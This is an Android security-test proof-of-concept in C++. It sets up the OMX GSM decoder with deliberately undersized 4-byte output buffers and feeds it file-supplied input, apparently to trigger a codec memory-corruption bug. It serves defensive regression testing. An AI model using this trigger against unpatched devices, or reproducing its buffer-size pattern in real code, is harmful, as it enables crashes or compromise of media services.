/**
 * Copyright (C) 2020 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

#include "../includes/common.h"
#include <stdlib.h>

// This PoC is only for 32-bit builds
#if _32_BIT
#include "../includes/omxUtils.h"
#include "hidlmemory/mapping.h"
#include <fstream>

#define FILE_SIZE UINT16_MAX + 1
#define INPUT_BUFFER_SIZE 16380
#define NUMBER_OF_BUFFERS 4
#define VULNERABLE_SIZE 4
#define SLEEP_TIME_IN_SECONDS 1
#define EMPTY_BUFFER_DONE_CALLBACK_TIMEOUT_IN_SEC 30

extern int numCallbackEmptyBufferDone;
sp<IAllocator> mAllocator = IAllocator::getService("ashmem");

int allocateHidlPortBuffers(OMX_U32 portIndex, Vector<Buffer> *buffers,
                            int BufferSize) {
  buffers->clear();
  OMX_PARAM_PORTDEFINITIONTYPE def;
  int err = omxUtilsGetParameter(portIndex, &def);
  omxExitOnError(err);
  for (OMX_U32 i = 0; i < def.nBufferCountActual; ++i) {
    Buffer buffer;
    buffer.mFlags = 0;
    bool success;
    auto transStatus = mAllocator->allocate(
        BufferSize, [&success, &buffer](bool s, hidl_memory const &m) {
          success = s;
          buffer.mHidlMemory = m;
        });
    omxExitOnError(!transStatus.isOk());
    omxExitOnError(!success);
    buffers->push(buffer);
  }
  return OK;
}
#endif /* _32_BIT */

int main(int argc, char *argv[]) {
  (void)argc;
  (void)argv;

// This PoC is only for 32-bit builds
#if _32_BIT
  if (argc != 2) {
    return EXIT_FAILURE;
  }
  std::ifstream file(argv[1], std::ifstream::binary);
  long size = FILE_SIZE;
  uint8_t *buffer = new uint8_t[size];
  if (!buffer) {
    file.close();
    return EXIT_FAILURE;
  }
  file.read((char *)buffer, size);

  /* Initialize OMX for the specified codec                                 */
  status_t ret = omxUtilsInit((char *)"OMX.google.gsm.decoder");
  omxExitOnError(ret);

  /* Set OMX input port parameters                                          */
  OMX_PARAM_PORTDEFINITIONTYPE *params = (OMX_PARAM_PORTDEFINITIONTYPE *)malloc(
      sizeof(OMX_PARAM_PORTDEFINITIONTYPE));
  if (!params) {
    file.close();
    delete[] buffer;
    return EXIT_FAILURE;
  }
  params->nPortIndex = OMX_UTILS_IP_PORT;
  params->nBufferSize = INPUT_BUFFER_SIZE;
  params->nBufferCountActual = params->nBufferCountMin = NUMBER_OF_BUFFERS;
  omxUtilsSetParameter(OMX_UTILS_IP_PORT, params);
  memset(params, 0, sizeof(OMX_PARAM_PORTDEFINITIONTYPE));
  omxUtilsGetParameter(OMX_UTILS_IP_PORT, params);

  /* Prepare input port buffers                                             */
  int inMemSize = params->nBufferCountActual * params->nBufferSize;
  int inBufferCnt = params->nBufferCountActual;
  int inBufferSize = inMemSize / inBufferCnt;
  IOMX::buffer_id *inBufferId = new IOMX::buffer_id[inBufferCnt];

  /* Set OMX output port parameters                                          */
  omxUtilsGetParameter(OMX_UTILS_OP_PORT, params);
  params->nPortIndex = OMX_UTILS_OP_PORT;
  params->nBufferSize = VULNERABLE_SIZE;
  params->nBufferCountActual = params->nBufferCountMin = NUMBER_OF_BUFFERS;
  omxUtilsSetParameter(OMX_UTILS_OP_PORT, params);
  memset(params, 0, sizeof(OMX_PARAM_PORTDEFINITIONTYPE));
  omxUtilsGetParameter(OMX_UTILS_OP_PORT, params);

  /* Prepare output port buffers                                            */
  int outBufferCnt = params->nBufferCountActual;
  int outBufferSize = VULNERABLE_SIZE;
  IOMX::buffer_id *outBufferId = new IOMX::buffer_id[outBufferCnt];

  Vector<Buffer> inputBuffers;
  Vector<Buffer> outputBuffers;
  /* Register input buffers with OMX component                              */
  allocateHidlPortBuffers(OMX_UTILS_IP_PORT, &inputBuffers, inBufferSize);
  for (int i = 0; i < inBufferCnt; ++i) {
    inBufferId[i] = inputBuffers[i].mID;
    sp<android::hidl::memory::V1_0::IMemory> mem =
        mapMemory(inputBuffers[i].mHidlMemory);
    memcpy((void *)mem->getPointer(), (void *)(buffer + INPUT_BUFFER_SIZE * i),
           INPUT_BUFFER_SIZE);
    omxUtilsUseBuffer(OMX_UTILS_IP_PORT, inputBuffers[i].mHidlMemory,
                      &inBufferId[i]);
  }

  /* Register output buffers with OMX component                             */
  allocateHidlPortBuffers(OMX_UTILS_OP_PORT, &outputBuffers, outBufferSize);
  for (int i = 0; i < outBufferCnt; ++i) {
    outBufferId[i] = outputBuffers[i].mID;
    omxUtilsUseBuffer(OMX_UTILS_OP_PORT, outputBuffers[i].mHidlMemory,
                      &outBufferId[i]);
  }

  /* Do OMX State change to Idle                                            */
  omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateIdle);
  /* Do OMX State change to Executing                                       */
  omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateExecuting);
  for (int i = 0; i < inBufferCnt; ++i) {
    OMXBuffer omxBuf(0, inBufferSize);
    omxUtilsEmptyBuffer(inBufferId[i], omxBuf, 0, 0, -1);
  }
  for (int i = 0; i < outBufferCnt; ++i) {
    OMXBuffer omxBuf(0, outBufferSize);
    omxUtilsFillBuffer(outBufferId[i], omxBuf, -1);
  }
  /* Do OMX State change to Idle                                            */
  omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateIdle);
  time_t currentTime = time(NULL);
  time_t endTime = currentTime + EMPTY_BUFFER_DONE_CALLBACK_TIMEOUT_IN_SEC;
  while (currentTime < endTime) {
    sleep(SLEEP_TIME_IN_SECONDS);
    if (numCallbackEmptyBufferDone == inBufferCnt) {
      break;
    }
    currentTime = time(NULL);
  }
  if (numCallbackEmptyBufferDone != inBufferCnt) {
    free(params);
    file.close();
    delete[] buffer;
    return EXIT_FAILURE;
  }
  /* Free input and output buffers                                          */
  for (int i = 0; i < inBufferCnt; ++i) {
    omxUtilsFreeBuffer(OMX_UTILS_IP_PORT, inBufferId[i]);
  }
  for (int i = 0; i < outBufferCnt; ++i) {
    omxUtilsFreeBuffer(OMX_UTILS_OP_PORT, outBufferId[i]);
  }

  /* Free OMX resources                                                     */
  omxUtilsFreeNode();
  free(params);
  file.close();
  delete[] buffer;
#endif /* _32_BIT */

  return EXIT_SUCCESS;
}
